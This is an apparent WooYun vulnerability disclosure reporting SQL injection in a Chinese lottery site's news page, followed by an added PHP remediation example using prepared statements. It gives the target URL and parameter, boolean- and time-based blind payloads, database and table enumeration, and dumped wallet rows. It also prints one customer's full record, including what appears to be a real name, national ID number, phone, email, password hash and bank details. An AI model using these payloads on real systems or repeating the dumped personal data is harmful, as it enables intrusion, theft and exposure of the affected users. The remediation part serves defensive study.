Vulnerability summary (followers: 24)

Defect ID: wooyun-2016-0173372

Title: SQL injection on a CAIPIAO (lottery) subsite leaks 2.28 million (228W) trading accounts

Vendor: 广东彩搜网络技术股份有限公司

Author: 路人甲

Submitted: 2016-01-28 16:52

Fixed: 2016-03-10 16:42

Published: 2016-03-10 16:42

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-01-28: Actively contacting the vendor and awaiting vendor acknowledgement; details not disclosed publicly
2016-03-10: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection on a lottery (CAIPIAO) subsite leaks 2.28 million (228W) trading accounts (including personal information and account balances); the balances are usable and can be spent on purchases.

Detailed description:

http://m.yicp.com/news/newslist.php?categoryId=15&pageNo=2

Proof of vulnerability:

Place: GET
Parameter: categoryId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: categoryId=15 AND 7949=7949&pageNo=2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: categoryId=15 AND SLEEP(5)&pageNo=2
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
available databases [7]:
[*] bbs
[*] caiso
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] tubiao
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
Database: caiso
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| business_wallet | 2284067 |
| business_email_log | 2283210 |
| business_customer | 2281872 |
| business_article | 376051 |
| business_term | 177302 |
| business_match_arrange | 42951 |
| business_wallet_log | 31784 |
| business_plan_item | 25498 |
| business_cps_day_report | 23884 |
| business_you_hui_ma | 22821 |
| business_ticket | 19871 |
| business_plan | 15115 |
| business_order | 14116 |
| business_prize_level | 13469 |
| business_sms_log | 7066 |
| business_payment_request | 6884 |
| activity_activity_detail | 5254 |
| business_part | 3374 |
| business_order_temp | 3256 |
| business_community | 3067 |
| business_chaseitem | 2636 |
| business_win_prize | 1275 |
| business_win_describe_ticket | 1010 |
| business_win_describe_order | 913 |
| business_back_money_request | 708 |
| business_chase | 539 |
| business_pay_out_request | 525 |
| admin_permissions | 340 |
| admin_role_function | 277 |
| business_print_term | 183 |
| business_article_inlink | 106 |
| business_feedback | 85 |
| admin_channel | 77 |
| business_article_category | 60 |
| business_spread_channel | 59 |
| admin_class | 40 |
| business_friendly_link | 37 |
| business_system_param | 28 |
| business_restricted | 22 |
| business_term_type_config | 21 |
Account balances
Table: business_wallet
[10 entries]
+------+--------+-------------------------------------------+---------+-----------+--------------+---------------+
| id | status | summary | balance | version | freeze_money | history_prize |
+------+--------+-------------------------------------------+---------+-----------+--------------+---------------+
| 1000 | 0 | f58e689b0081dbde2d34c540e6b5f48f | 10.23 | 178 | 5.00 | 0.00 |
| 1001 | 0 | b329391393230a8d4d055bc7fc9ca451 | 40.24 | 52 | 4.00 | 0.00 |
| 1002 | 0 | ffc3d18a6fccf2284e0b66efcccab237 | 174.90 | 231 | 9.00 | 0.00 |
| 1003 | 0 | 79d5cdcdd8ae7d673c93d3c4a5f611cf | 0.00 | 1 | 0.00 | 0.00 |
| 1004 | 0 | 5f0c856744ebf98152fc0e62912018a6 | 86.34 | 167 | 0.00 | 0.00 |
| 1005 | 0 | a66f96d93409f473f3d4484c6f868845 | 33.35 | 11 | 0.00 | 0.00 |
| 1006 | 0 | b61292dc9237be7741a69a24d5019632 (100600) | 0.00 | 1 | 0.00 | 0.00 |
| 1007 | 0 | 4d82760bb00a54316a6f939fd620744a (100700) | 0.00 | 1 | 0.00 | 0.00 |
| 1008 | 0 | fee4181443c7299d710d3036451418e4 | 0.00 | 1 | 0.00 | 0.00 |
| 1009 | 0 | f9e9c455c87f29309f7e2d32b70c4817 | 0.00 | 1 | 0.00 | 0.00 |
+------+--------+-------------------------------------------+---------+-----------+--------------+---------------+
Database: caiso
Table: business_customer
[1 entry]
+------+---------+----------+-----------+------------+-------------+--------------+---------------+---------------+-----+------+------+------+-------+------------------+--------+---------+---------+----------+----------------------------------+----------+----------+----------+-------------+-----------+-----------+-----------+-----------+-----------+-----------+--------------------+------------+------------+---------------------------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+---------------------------------+---------------------+---------------+---------------+---------------+---------------+---------------------+------------------+-------------------+-------------------+--------------------+
| id | open_id | user3_id | wallet_id | channel_id | superior_id | ssuperior_id | commission_id | admin_user_id | old | ask | city | bank | bound | email | status | is_pass | remarks | province | password | question | usr_type | is_apply | mobile_no | yanzhenma | login_num | bank_name | real_name | nick_name | subbranch | credent_no | sssuperior | reg_source | sms_accept | ploy_accur | super_ratio | customer_ip | reg_channel | bank_number | ssuper_ratio | credent_type | email_accept | register_time | ploy_consumed | sssuper_ratio | all_win_money | customer_type | last_login_time | super_commission | ssuper_commission | wake_up_email_num | sssuper_commission |
+------+---------+----------+-----------+------------+-------------+--------------+---------------+---------------+-----+------+------+------+-------+------------------+--------+---------+---------+----------+----------------------------------+----------+----------+----------+-------------+-----------+-----------+-----------+-----------+-----------+-----------+--------------------+------------+------------+---------------------------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+---------------------------------+---------------------+---------------+---------------+---------------+---------------+---------------------+------------------+-------------------+-------------------+--------------------+
| 1000 | NULL | NULL | 1000 | 11 | NULL | NULL | 1 | NULL | 0 | NULL | 广州 | 0 | bound | [email protected] | 1 | 1 | NULL | 广东 | 60C4D9185D2BA0717AB5EC2D32A7DBD6 | <blank> | 0 | <blank> | 13632725483 | 152005 | 323 | 彭方良 | 彭方良 | fabulous | 骏景支行 | 522422198309090818 | NULL | 2 | 0000000000000000000000000000000 | 0 | 0.03 | 183.6.176.106 | NULL | 612226 | 0.00 | NULL | 0000000000000000000000000000000 | 2013-12-03 10:34:58 | 0 | NULL | 916.84 | NULL | 2015-12-30 16:00:16 | 0.00 | 0.00 | NULL | NULL |
+------+---------+----------+-----------+------------+-------------+--------------+---------------+---------------+-----+------+------+------+-------+------------------+--------+---------+---------+----------+----------------------------------+----------+----------+----------+-------------+-----------+-----------+-----------+-----------+-----------+-----------+--------------------+------------+------------+---------------------------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+---------------------------------+---------------------+---------------+---------------+---------------+---------------+---------------------+------------------+-------------------+-------------------+--------------------+

Remediation:

Parameter filtering: validate the `categoryId` and `pageNo` query parameters as integers and pass them to the database through prepared statements rather than string concatenation.

Copyright notice: when reposting, credit the source: 路人甲@乌云 (WooYun)
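The following is an added example of what that remediation looks like for the affected `newslist.php` endpoint; it is not code from the report, the vendor, or the site. It assumes PHP 7.1 or later with the mysqli extension (mysqlnd for `get_result()`), and a table `business_article` with columns `id`, `title`, `publish_time` and `category_id`; the table and column names, the `news_reader` account and the page size are assumptions. Both parameters are validated as positive integers before use, and the query itself uses bound integer placeholders, so a value such as `15 AND 7949=7949` or `15 AND SLEEP(5)` is rejected with a 400 and could not alter the SQL even if it reached the query.

```php
<?php
declare(strict_types=1);

// Added example, not code from the report or the vendor. Assumes PHP 7.1+ with
// mysqli (mysqlnd) and a table business_article(id, title, publish_time, category_id);
// those names, the news_reader account and the page size are assumptions.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // mysqli errors become exceptions

/**
 * Validate a raw query-string value as an integer in [1, $max].
 * Returns $default when the parameter is absent and null when it is malformed.
 * Anything that is not purely an integer ("15 AND 7949=7949", "15 AND SLEEP(5)",
 * an array parameter) is rejected here and never reaches the SQL layer.
 */
function positive_int($raw, int $default, int $max = PHP_INT_MAX): ?int
{
    if ($raw === null || $raw === '') {
        return $default;
    }
    if (!is_string($raw)) {
        return null; // e.g. categoryId[]=1
    }
    $value = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => $max],
    ]);
    return $value === false ? null : $value;
}

/** Fetch one page of articles for a category using a prepared statement. */
function fetch_news(mysqli $db, int $categoryId, int $pageNo, int $pageSize = 20): array
{
    $offset = ($pageNo - 1) * $pageSize;
    // Placeholders are bound as integers; the values are never concatenated into
    // the SQL text, so boolean- and time-based payloads have no effect.
    $stmt = $db->prepare(
        'SELECT id, title, publish_time FROM business_article
          WHERE category_id = ? ORDER BY publish_time DESC LIMIT ? OFFSET ?'
    );
    $stmt->bind_param('iii', $categoryId, $pageSize, $offset);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// --- request handling for newslist.php?categoryId=15&pageNo=2 ---
$categoryId = positive_int($_GET['categoryId'] ?? null, 1);
$pageNo     = positive_int($_GET['pageNo'] ?? null, 1, 100000);
if ($categoryId === null || $pageNo === null) {
    http_response_code(400);
    exit('invalid parameter');
}

// Least privilege: a read-only account granted SELECT on the news tables only,
// not the application's full database user (credentials are placeholders).
$db = new mysqli('localhost', 'news_reader', 'REPLACE_WITH_SECRET', 'caiso');
$db->set_charset('utf8mb4');

foreach (fetch_news($db, $categoryId, $pageNo) as $row) {
    echo htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8'), "\n";
}
```

The database account matters as much as the query: the report shows that the injected query could enumerate seven databases and read `business_customer` and `business_wallet`, which a public news page has no reason to touch. A dedicated account limited to the article tables bounds what any future injection in this endpoint can reach.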


Vulnerability response

Vendor response:

Vendor could not be contacted, or the vendor actively declined

Vulnerability rank: 15 (WooYun rating)